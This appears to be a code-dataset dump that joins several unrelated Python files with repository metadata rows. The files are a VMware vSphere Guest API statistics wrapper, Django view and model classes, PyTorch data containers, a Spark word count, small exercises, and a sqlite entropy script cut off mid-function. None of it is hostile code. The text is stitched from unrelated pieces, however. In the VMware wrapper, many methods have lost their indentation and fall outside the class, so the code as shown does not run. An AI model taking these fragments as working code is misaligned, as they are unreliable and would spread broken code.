    'VMGUESTLIB_ERROR_NOT_RUNNING_IN_VM',
    'VMGUESTLIB_ERROR_NOT_ENABLED',
    'VMGUESTLIB_ERROR_NOT_AVAILABLE',
    'VMGUESTLIB_ERROR_NO_INFO',
    'VMGUESTLIB_ERROR_MEMORY',
    'VMGUESTLIB_ERROR_BUFFER_TOO_SMALL',
    'VMGUESTLIB_ERROR_INVALID_HANDLE',
    'VMGUESTLIB_ERROR_INVALID_ARG',
    'VMGUESTLIB_ERROR_UNSUPPORTED_VERSION',
)
# Human-readable messages, indexable by the same numeric status code.
VMErrMsgs = (
    'The function has completed successfully.',
    'An error has occurred. No additional information about the type of error is available.',
    'The program making this call is not running on a VMware virtual machine.',
    'The vSphere Guest API is not enabled on this host, so these functions cannot be used. For information about how to enable the library, see "Context Functions" on page 9.',
    'The information requested is not available on this host.',
    'The handle data structure does not contain any information. You must call VMGuestLib_UpdateInfo to update the data structure.',
    'There is not enough memory available to complete the call.',
    'The buffer is too small to accommodate the function call. For example, when you call VMGuestLib_GetResourcePoolPath, if the path buffer is too small for the resulting resource pool path, the function returns this error. To resolve this error, allocate a larger buffer.',
    'The handle that you used is invalid. Make sure that you have the correct handle and that it is open. It might be necessary to create a new handle using VMGuestLib_OpenHandle.',
    'One or more of the arguments passed to the function were invalid.',
    'The host does not support the requested statistic.',
)
class VMGuestLibException(Exception):
    '''Raised when a vSphere Guest API call returns a non-success
    VMGuestLibError status code.

    Attributes:
      errno   -- the numeric VMGuestLibError code
      message -- error text resolved from the native library
      strerr  -- the corresponding entry from VMErrMsgs
    '''
    def __init__(self, errno):
        self.errno = errno
        # Ask the native library for its own textual description of the code.
        self.GetErrorText = vmGuestLib.VMGuestLib_GetErrorText
        self.GetErrorText.restype = c_char_p
        self.message = self.GetErrorText(self.errno)
        self.strerr = VMErrMsgs[self.errno]
    def __str__(self):
        # Library text on the first line, local description on the second.
        return '%s\n%s' % (self.message, self.strerr)
class VMGuestLib(Structure):
    def __init__(self):
        # Opaque guest library handle (VMGuestLibHandle in vmGuestLib.h);
        # all statistics below are read through this context.
        self.handle = self.OpenHandle()
        self.UpdateInfo()
        # Session ID for the current run of the VM. It changes after vMotion,
        # suspend/resume, or snapshot revert, which invalidates previously
        # retrieved data — callers can compare session IDs to detect this.
        # Must be fetched after UpdateInfo(). VMSessionID is defined in
        # vmSessionId.h and is opaque (not comparable across VMs).
        self.sid = self.GetSessionId()
    def OpenHandle(self):
        '''Return a guest library handle, creating one on first use.

        The handle provides the context for all other Guest API calls;
        statistics fetched through one handle do not affect another.
        Raises VMGuestLibException on failure.'''
        if hasattr(self, 'handle'):
            return self.handle
        else:
            handle = c_void_p()
            ret = vmGuestLib.VMGuestLib_OpenHandle(byref(handle))
            if ret != VMGUESTLIB_ERROR_SUCCESS:
                raise VMGuestLibException(ret)
            return handle
    def CloseHandle(self):
        '''Release the handle acquired with OpenHandle (no-op if absent).'''
        if hasattr(self, 'handle'):
            ret = vmGuestLib.VMGuestLib_CloseHandle(self.handle.value)
            if ret != VMGUESTLIB_ERROR_SUCCESS:
                raise VMGuestLibException(ret)
            del (self.handle)
    def UpdateInfo(self):
        '''Refresh the statistics associated with this handle.

        Costs roughly a system call, so call sparingly. Handles are not
        internally locked: each thread needs its own handle, or callers
        must serialise updates themselves.'''
        ret = vmGuestLib.VMGuestLib_UpdateInfo(self.handle.value)
        if ret != VMGUESTLIB_ERROR_SUCCESS:
            raise VMGuestLibException(ret)
    def GetSessionId(self):
        '''Return the VMSessionID for the current session.

        Valid only after UpdateInfo(); otherwise the library reports
        VMGUESTLIB_ERROR_NO_INFO (raised as VMGuestLibException).'''
        sid = c_void_p()
        ret = vmGuestLib.VMGuestLib_GetSessionId(self.handle.value, byref(sid))
        if ret != VMGUESTLIB_ERROR_SUCCESS:
            raise VMGuestLibException(ret)
        return sid
def GetCpuLimitMHz(self):
'''Retrieves the upperlimit of processor use in MHz available to the virtual
machine. For information about setting the CPU limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuLimitMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuReservationMHz(self):
'''Retrieves the minimum processing power in MHz reserved for the virtual
machine. For information about setting a CPU reservation, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuReservationMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuShares(self):
'''Retrieves the number of CPU shares allocated to the virtual machine. For
information about how an ESX server uses CPU shares to manage virtual
machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuStolenMs(self):
'''Retrieves the number of milliseconds that the virtual machine was in a
ready state (able to transition to a run state), but was not scheduled to run.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuStolenMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuUsedMs(self):
'''Retrieves the number of milliseconds during which the virtual machine
has used the CPU. This value includes the time used by the guest
operating system and the time used by virtualization code for tasks for this
virtual machine. You can combine this value with the elapsed time
(VMGuestLib_GetElapsedMs) to estimate the effective virtual machine
CPU speed. This value is a subset of elapsedMs.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetElapsedMs(self):
'''Retrieves the number of milliseconds that have passed in the virtual
machine since it last started running on the server. The count of elapsed
time restarts each time the virtual machine is powered on, resumed, or
migrated using VMotion. This value counts milliseconds, regardless of
whether the virtual machine is using processing power during that time.
You can combine this value with the CPU time used by the virtual machine
(VMGuestLib_GetCpuUsedMs) to estimate the effective virtual machine
CPU speed. cpuUsedMs is a subset of this value.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetElapsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostCpuUsedMs(self):
'''Undocumented.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetHostCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemKernOvhdMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemKernOvhdMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemMappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysFreeMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysFreeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSharedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUnmappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUnmappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUsedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostNumCpuCores(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostNumCpuCores(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetHostProcessorSpeed(self):
'''Retrieves the speed of the ESX system's physical CPU in MHz.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostProcessorSpeed(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemActiveMB(self):
    '''Memory the virtual machine is actively using — its estimated
    working-set size — in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemActiveMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemBalloonedMB(self):
    '''Memory reclaimed from this virtual machine by the vSphere memory
    balloon ("vmmemctl") driver, in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemBalloonedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonMaxMB(self):
    '''Undocumented VMGuestLib call; name suggests the balloon driver's maximum size in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemBalloonMaxMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonTargetMB(self):
    '''Undocumented VMGuestLib call; name suggests the balloon driver's target size in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemBalloonTargetMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemLimitMB(self):
    '''Upper limit of memory available to the virtual machine, in MB.
    See "Limits and Reservations" in the Guest SDK documentation for how
    this limit is configured.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemLimitMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# TODO: Undocumented routine, needs testing
def GetMemLLSwappedMB(self):
    '''Undocumented VMGuestLib call (LL presumably "low-level" swap, MB).'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemLLSwappedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemMappedMB(self):
    '''Memory allocated to the virtual machine, in MB, excluding pages that
    are ballooned, swapped, or were never accessed.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemMappedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemOverheadMB(self):
    '''"Overhead" memory currently consumed on the host for this virtual
    machine, in MB — extra memory reserved for data structures required by
    the virtualization layer.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemOverheadMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemReservationMB(self):
    '''Minimum amount of memory reserved for the virtual machine, in MB.
    See "Limits and Reservations" in the Guest SDK documentation.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemReservationMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemSharedMB(self):
    '''Physical memory of this virtual machine that is copy-on-write (COW)
    shared on the host, in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemSharedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemSharedSavedMB(self):
    '''Estimated host physical memory saved by copy-on-write (COW) sharing
    of guest physical memory, in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemSharedSavedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemShares(self):
    '''Number of memory shares allocated to the virtual machine. ESX uses
    shares to prioritise VMs; see the vSphere Resource Management Guide.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemShares(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemSwappedMB(self):
    '''Memory reclaimed from this virtual machine by transparently swapping
    guest memory to disk, in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemSwappedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# TODO: Undocumented routine, needs testing
def GetMemSwapTargetMB(self):
    '''Undocumented VMGuestLib call; name suggests the swap target size in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemSwapTargetMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemTargetSizeMB(self):
    '''Size of the target memory allocation for this virtual machine, in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemTargetSizeMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
def GetMemUsedMB(self):
    '''Estimated physical host memory currently consumed for this virtual
    machine's physical memory, in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemUsedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# TODO: Undocumented routine, needs testing
def GetMemZippedMB(self):
    '''Undocumented VMGuestLib call; name suggests compressed guest memory in MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemZippedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# TODO: Undocumented routine, needs testing
def GetMemZipSavedMB(self):
    '''Undocumented VMGuestLib call; name suggests memory saved by compression, MB.'''
    result = c_uint()
    status = vmGuestLib.VMGuestLib_GetMemZipSavedMB(self.handle.value, byref(result))
    if status != VMGUESTLIB_ERROR_SUCCESS:
        raise VMGuestLibException(status)
    return result.value
# vim:ts=4:sw=4:et
| [
"[email protected]"
]
| |
edde0aa8cdab82be21c8ef2341f0114662f4921c | 2d89afd5ca29fc2735a00b0440ea7d5408c8e398 | /Crash Course/chap07/cities.py | ca28aba1f3091b08eb1dc268634339b862f19435 | []
| no_license | TrystanDames/Python | 6b2c8721606e046d9ff0708569a97d7b78a0f88e | 68b3f5f160b46fa4e876d58808ff78ac7f2d84df | refs/heads/main | 2023-06-03T14:25:51.638345 | 2021-06-23T08:54:18 | 2021-06-23T08:54:18 | 357,112,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | prompt = "\nPlease enter the name of a city you have visited:"
prompt += "\n(Enter 'quit' when you are finished.) "
while True:
city = input(prompt)
if city == 'quit':
break
else:
print(f"I'd love to go to {city.title()}!") | [
"[email protected]"
]
| |
3523fe1ae052b3f169f7bc74db4e83be9b2377c2 | 40afc1f3790099d2d5270503d101f30c71a89f07 | /usersys/views/user.py | d4c9af3172aaa675d041cfa02bcb920867dd7649 | []
| no_license | fhydralisk/reviewing | a3d31af1e8fe8caf2e831b35816d638ac0cadcce | 7a27f278f85f9fdbcc805b0290f6bbdbb7147609 | refs/heads/master | 2020-05-14T23:27:37.229343 | 2019-05-07T12:28:21 | 2019-05-07T12:28:21 | 181,997,119 | 0 | 2 | null | 2019-05-07T07:38:14 | 2019-04-18T01:49:53 | Python | UTF-8 | Python | false | false | 431 | py | from base.views import WLAPIGenericView
from ..serializers import user as user_serializers
from ..funcs import user as user_funcs
class UserView(WLAPIGenericView):
    """WL API view wiring user detail (GET) and partial update (PATCH) handlers."""

    # Only these HTTP verbs are routed; anything else is rejected by Django.
    http_method_names = ['get', 'patch', 'options']

    # Request-body serializer, keyed by HTTP method.
    API_SERIALIZER = dict(
        patch=user_serializers.UserPartialUpdateSerializer,
    )

    # Response serializer, keyed by HTTP method.
    RESULT_SERIALIZER = dict(
        get=user_serializers.UserDetailSerializer,
    )

    # Business-logic class the generic view delegates to.
    FUNC_CLASS = user_funcs.UserFunc
| [
"[email protected]"
]
| |
adaa3bcc2f1130b6551be40f14ba5bf15c68f983 | 5117ae47abf2b1c72c5c808b39048ae2686be0f9 | /listings/models.py | 6b8b3acddd8045715c14f5018ba637bdbbdbed0d | []
| no_license | nayanpsharma/nayan_property_project | a7cc18bbedccf7f12b7bde16658898581ad02146 | 1ef766444696b3049f6e630e6c6a9b75d779c2b4 | refs/heads/master | 2022-12-18T21:57:47.426545 | 2020-09-18T21:16:26 | 2020-09-18T21:16:26 | 296,731,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | from django.db import models
from datetime import datetime
from realtors.models import Realtor
class Listing(models.Model):
    """A property listing posted by a realtor."""

    # Deleting a realtor must not cascade-delete their listings.
    realtor = models.ForeignKey(Realtor, on_delete=models.DO_NOTHING)
    title = models.CharField(max_length=200)
    address = models.CharField(max_length=200)
    city = models.CharField(max_length=100)
    state = models.CharField(max_length=100)
    zipcode = models.CharField(max_length=20)
    description = models.TextField(blank=True)
    price = models.IntegerField()
    bedrooms = models.IntegerField()
    # Decimal so half-bathrooms (e.g. 2.5) can be stored.
    bathrooms = models.DecimalField(max_digits=2, decimal_places=1)
    garage = models.IntegerField(default=0)
    sqft = models.IntegerField()
    lot_size = models.DecimalField(max_digits=5, decimal_places=1)
    # NOTE(review): the upload path uses 'photos/%Y%m/%d/' — possibly a typo
    # for 'photos/%Y/%m/%d/'. Confirm before changing; existing uploads
    # already live under the current layout.
    photo_main = models.ImageField(upload_to='photos/%Y%m/%d/')
    # Optional gallery photos; only photo_main is required.
    photo_1 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
    photo_2 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
    photo_3 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
    photo_4 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
    photo_5 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
    photo_6 = models.ImageField(upload_to='photos/%Y%m/%d/', blank = True)
    # Unpublished listings can be hidden from the public site.
    is_published = models.BooleanField(default=True)
    list_date = models.DateTimeField(default=datetime.now, blank=True)

    def __str__(self):
        # Admin and template pages display the listing by its title.
        return self.title
| [
"[email protected]"
]
| |
fde0cdf4ea3b11cec022c1c518b01a1f0e60eabc | 4559036e4b91f064c85214276a526ed566107f1f | /surname_rnn/surname/containers.py | 0a8b4fc2b42148f674fa2146ee9800ea9e96f927 | [
"Apache-2.0"
]
| permissive | sudarshan85/nlpbook | f55017e5ec0d20f0bf5816438835322a8eff70e4 | 41e59d706fb31f5185a0133789639ccffbddb41f | refs/heads/master | 2020-04-28T01:49:42.739340 | 2019-05-03T16:09:08 | 2019-05-03T16:09:08 | 174,873,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,614 | py | #!/usr/bin/env python
import pandas as pd
from pathlib import Path
from torch.utils.data import DataLoader
class ModelContainer(object):
    """Bundle a model with the objects used to train it.

    Attributes mirror the constructor arguments: model, optimizer, loss_fn,
    and an optional learning-rate scheduler (None when not supplied).
    """

    def __init__(self, model, optimizer, loss_fn, scheduler=None):
        self.model, self.optimizer = model, optimizer
        self.loss_fn, self.scheduler = loss_fn, scheduler
class DataContainer(object):
    """Own the train/val(/test) splits, their datasets and DataLoaders.

    Splits `df_with_split` on its 'split' column, builds (or loads) the
    vectorizer from the training split, and wraps each split in
    `dataset_class` plus a shuffling, drop-last DataLoader.
    """

    def __init__(self, df_with_split: pd.DataFrame, dataset_class, vectorizer_file: Path,
                 batch_size: int, with_test=True, is_load: bool=True) -> None:
        # Partition the frame by its 'split' column.
        self.train_df = df_with_split.loc[df_with_split['split'] == 'train']
        self.val_df = df_with_split.loc[df_with_split['split'] == 'val']
        self._bs = batch_size
        self.with_test = with_test
        self.is_load = is_load
        self._lengths = {'train_size': len(self.train_df), 'val_size': len(self.val_df)}
        # Batches per epoch; drop_last=True below means partial batches are discarded.
        self._n_batches = [self._lengths['train_size'] // self._bs,
                           self._lengths['val_size'] // self._bs]

        # When not loading, fit a fresh vectorizer on the training split and
        # persist it so subsequent runs can reuse it.
        if not self.is_load:
            print("Creating and saving vectorizer")
            train_ds = dataset_class.load_data_and_create_vectorizer(self.train_df)
            train_ds.save_vectorizer(vectorizer_file)

        # Always (re)load from file so train/val/test share one vectorizer.
        self.train_ds = dataset_class.load_data_and_vectorizer_from_file(self.train_df, vectorizer_file)
        self.vectorizer = self.train_ds.vectorizer
        self.surname_vocab = self.vectorizer.surname_vocab
        self.nationality_vocab = self.vectorizer.nationality_vocab
        self.train_dl = DataLoader(self.train_ds, self._bs, shuffle=True, drop_last=True)

        self.val_ds = dataset_class.load_data_and_vectorizer(self.val_df, self.vectorizer)
        self.val_dl = DataLoader(self.val_ds, self._bs, shuffle=True, drop_last=True)

        # The test split is optional; when present it reuses the same vectorizer.
        if self.with_test:
            self.test_df = df_with_split.loc[df_with_split['split'] == 'test']
            self._lengths['test_size'] = len(self.test_df)
            self._n_batches.append(self._lengths['test_size'] // self._bs)
            self.test_ds = dataset_class.load_data_and_vectorizer(self.test_df, self.vectorizer)
            self.test_dl = DataLoader(self.test_ds, self._bs, shuffle=True, drop_last=True)

    def get_loaders(self):
        # NOTE(review): unconditionally returns test_dl, which only exists
        # when with_test=True — would raise AttributeError otherwise.
        return self.train_dl, self.val_dl, self.test_dl

    @property
    def train_batches(self):
        return self._n_batches[0]

    @property
    def val_batches(self):
        return self._n_batches[1]

    @property
    def test_batches(self):
        # NOTE(review): NameError is an unusual choice here; callers likely
        # expect RuntimeError/AttributeError. Kept as-is for compatibility.
        if not self.with_test:
            raise NameError("No test dataset was provided")
        return self._n_batches[2]

    @property
    def vocab_size(self):
        # Number of distinct surname characters/tokens in the vectorizer.
        return len(self.surname_vocab)

    @property
    def n_classes(self):
        # Number of nationality labels.
        return len(self.nationality_vocab)

    @property
    def sizes(self):
        # Row counts per split: train_size, val_size and (optionally) test_size.
        return self._lengths
"[email protected]"
]
| |
ae970afe343d32e40e8270515b8495c93e849c6a | bd34847cf9e0e7c57f86c709bd0ab375b3eef682 | /spark/word_count.py | 3e27f4a950058d786f358811bf6c98674d325add | []
| no_license | vshaveyko/learn_py | 68ad17c1353859d32997989ae12de6a6ccd113da | 2ceb5ed599ce59a611fb5ad366c9b45e2db29a82 | refs/heads/master | 2021-09-01T22:44:16.980240 | 2017-12-29T01:06:25 | 2017-12-29T01:06:25 | 115,279,253 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | '''Print the words and their frequencies in this file'''
import operator
import pyspark
def main():
'''Program entry point'''
#Intialize a spark context
with pyspark.SparkContext("local", "PySparkWordCount") as sc:
#Get a RDD containing lines from this script file
lines = sc.textFile(__file__)
#Split each line into words and assign a frequency of 1 to each word
words = lines.flatMap(lambda line: line.split(" ")).map(lambda word: (word, 1))
#count the frequency for words
counts = words.reduceByKey(operator.add)
#Sort the counts in descending order based on the word frequency
sorted_counts = counts.sortBy(lambda x: x[1], False)
#Get an iterator over the counts to print a word and its frequency
for word,count in sorted_counts.toLocalIterator():
print(u"{} --> {}".format(word, count))
# Run the word count only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
| [
"[email protected]"
]
| |
f14053094b1246b3f7886581c70b392f158becb0 | 5b912db9e8bb7fa99d1e0932eb8a0dac7b1382f0 | /t09_get_rid_of_it/rid.py | 78d3728d97c74c9cb27f702750a297a07ef4ef65 | []
| no_license | AwesomeCrystalCat/py_s00 | 3df7b285855ea276736d0a01d98df2d8465ad707 | f4814a889b49d013b8285ab15992d0a309056ea6 | refs/heads/main | 2023-04-05T22:23:42.637972 | 2021-04-09T10:27:13 | 2021-04-09T10:27:13 | 356,228,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | my_number = 1
print(my_number)
del(my_number)
print(my_number)
| [
"[email protected]"
]
| |
9518aed6232253576108cf492c812148ebcac253 | 90c9acae92fa0ccb63f796561aef10bb9a3a31c9 | /python/analyze_db.py | 37d1f04425e0e684e1da2427fa96e25906abe190 | []
| no_license | chtlp/witness-mining | cc94f4d3249316e15eafa354ef513815fb919326 | f27455bfab2d9557494e507665418db67fe7b43f | refs/heads/master | 2021-01-19T20:27:48.079120 | 2012-08-08T09:41:54 | 2012-08-08T09:41:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,381 | py | from collections import defaultdict, OrderedDict
import csv, sqlite3, glob, sys, subprocess
from pylab import *
def analyze_columns(col_names, values):
    """Summarise each column of `values`, returning a list parallel to `col_names`.

    For every column, count how often each distinct value occurs. A column's
    slot holds its (at most) 10 most frequent values when together they cover
    at least 90% of the rows; otherwise the column is considered too spread
    out and its slot stays None.
    """
    num = len(col_names)
    unique_values = [defaultdict(int) for _ in range(num)]
    for row in values:
        for k, c in enumerate(row):
            unique_values[k][c] += 1
    col_values = [None] * num
    for k in range(num):
        tot = sum(unique_values[k].values())
        # FIX: tuple-unpacking lambda parameters (lambda (v, c): ...) are
        # Python-2-only syntax; indexing/unpacking below is behaviourally
        # identical and also valid on Python 3.
        items = sorted(unique_values[k].items(), key=lambda vc: -vc[1])[:10]
        if sum(c for _, c in items) >= 0.9 * tot:
            col_values[k] = [v for v, _ in items]
    return col_values
def build_count_table(col_values, col_names, values, subj):
    """Cross-tabulate every summarised column against the subject column `subj`."""
    subj_idx = col_names.index(subj)
    # The subject column itself must have a value summary.
    assert col_values[subj_idx]
    num = len(col_values)
    count_table = [None] * num
    # One contingency matrix per column that has a value summary.
    for k in range(num):
        if col_values[k]:
            count_table[k] = zeros((len(col_values[k]), len(col_values[subj_idx])))
    # Count co-occurrences of (column value, subject value) row by row.
    for row in values:
        subj_val = row[subj_idx]
        for k, cell in enumerate(row):
            if col_values[k] and cell in col_values[k] and subj_val in col_values[subj_idx]:
                count_table[k][col_values[k].index(cell), col_values[subj_idx].index(subj_val)] += 1
    return count_table
def compute_entropy(count_table, col_names, subj):
    """Print conditional entropies of `subj` given each summarised column,
    and write each column's MIC score to analyze_db.log as "<name>\\t<mic>".

    `count_table` is the output of build_count_table: per column, either a
    contingency matrix against the subject column, or None (skipped).
    """
    # FIX: use `with` so the log file is closed even if an assert fires;
    # `print(...)` in call form runs identically on Python 2 and Python 3
    # (the original used Python-2-only print statements).
    with open('analyze_db.log', 'w') as ofile:
        for k, t in enumerate(count_table):
            if t is None:
                continue
            print('cond_entropy( %s | %s ):\n' % (subj, col_names[k]))
            supp = t.sum()
            ent = 0.0
            m, n = t.shape
            # Conditional entropy H(subj | column k).
            for i in range(m):
                lsum = t[i,:].sum()
                for j in range(n):
                    if t[i,j]:
                        ent += t[i,j] / supp * log( lsum / t[i,j] )
            # Joint entropy H(X, Y).
            h_xy = 0.0
            for i in range(m):
                for j in range(n):
                    if t[i,j]:
                        h_xy += (t[i,j] / supp) * log(supp / t[i,j])
            # Marginal entropy of the column (rows).
            h_x = 0.0
            for i in range(m):
                s = t[i,:].sum()
                if s:
                    h_x += (s / supp) * log(supp / s)
            # Marginal entropy of the subject (columns).
            h_y = 0.0
            for j in range(n):
                s = t[:,j].sum()
                if s:
                    h_y += (s / supp) * log(supp / s)
            assert h_x <= h_xy and h_y <= h_xy,'h_x = %.3f, h_y = %.3f, h_xy = %.3f' % (h_x, h_y, h_xy)
            print('\tsupport = %d, value = %.3f\n' % (supp, ent))
            if not h_x:
                continue
            # Mutual information normalised by the smaller marginal entropy.
            mic = (h_x + h_y - h_xy) / min(h_x, h_y)
            print('\tmic = %.3f\n' % mic)
            ofile.write('%s\t%.3f\n' % (col_names[k], mic))
def analyze_table(col_names, values, subj):
    """Run the full pipeline: summarise columns, cross-tabulate, report entropy."""
    summaries = analyze_columns(col_names, values)
    tables = build_count_table(summaries, col_names, values, subj)
    compute_entropy(tables, col_names, subj)
def analyze_person_accident(conn, cur):
    """Join PERSON with ACCIDENT on CASENUM and analyse injury severity (INJ_SEV)."""
    cur.execute("PRAGMA table_info(PERSON)")
    c1 = cur.fetchall()
    cur.execute("PRAGMA table_info(ACCIDENT)")
    c2 = cur.fetchall()
    cur.execute('select * from PERSON JOIN ACCIDENT where PERSON.CASENUM == ACCIDENT.CASENUM')
